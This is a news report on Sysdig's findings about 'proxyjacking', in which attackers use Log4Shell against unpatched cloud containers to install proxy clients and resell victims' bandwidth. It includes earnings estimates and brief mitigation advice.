The Sysdig Threat Research Team has discovered a new attack vector based on the interception of legitimate proxy services that allow people to sell part of their bandwidth to third parties.
Sysdig researchers said that a new attack vector called "proxyjacking" allows cybercriminals to earn hundreds of thousands of dollars a month in the form of passive income.
According to Kaspersky Lab, proxy services work like this: The user installs a client that creates a proxy server. The client makes the Internet connection of the device available to an external party - a proxy service, which then resells part of the user's bandwidth to other people.
Proxy technology has found use among users who use someone else's IP address to bypass geoblocks or view dubious websites without being tied to their own IP address. Usually, people pay per IP address based on the number of hours the application is running.
In one of the attacks observed by Sysdig researchers, attackers compromised a container in the cloud using a Log4j vulnerability (Log4Shell) and then installed a proxy client that turned the system into a proxy server without the knowledge of the container owner. The attacker then sold the IP address of the compromised device to a proxy service.
Typically, Log4j attacks involve a hacker downloading a backdoor or cryptojacking payload onto a device. Crystal Morin, threat research engineer at Sysdig, said that proxyjacking is similar to cryptojacking in that they both benefit from the victim's bandwidth - and both are about equally beneficial to the attacker. However, the two attacks differ in that the miner uses CPU resources, while proxyjacking uses network resources, with minimal CPU load.
Morin noted that the impact of proxyjacking on the system is negligible: 1 GB of network traffic distributed over the course of a month amounts to tens of megabytes per day - it is very likely that the attack will go unnoticed.
In the discovered attack, hackers compromised an unpatched Apache Solr service running on a Kubernetes infrastructure in order to take control of a container in the environment. Then the cybercriminals downloaded a malicious script from the C2 server, which they placed in the "/tmp" folder in order to be able to use the compromised module to make money.
The researchers noticed that the attackers tried to cover up traces of malicious activity by clearing the history and deleting the downloaded binary file, as well as temporary files.
Researchers estimate that for 24 hours of work from a single hacked IP address, an attacker can earn $9.60 per month. Experts noted that if 100 IP addresses are compromised, a cybercriminal can earn passive income of almost $1,000 per month.
When using Log4j on unpatched systems, this figure could be even higher, as millions of servers are still running vulnerable versions of the logging tool, and according to Censys, more than 23,000 of them are available online. “Theoretically, the Log4j vulnerability alone could bring an attacker more than $220,000 in profit per month,” Morin said.
To avoid huge bills for using proxies, organizations should set billing limits and verification tool alerts, the researchers say.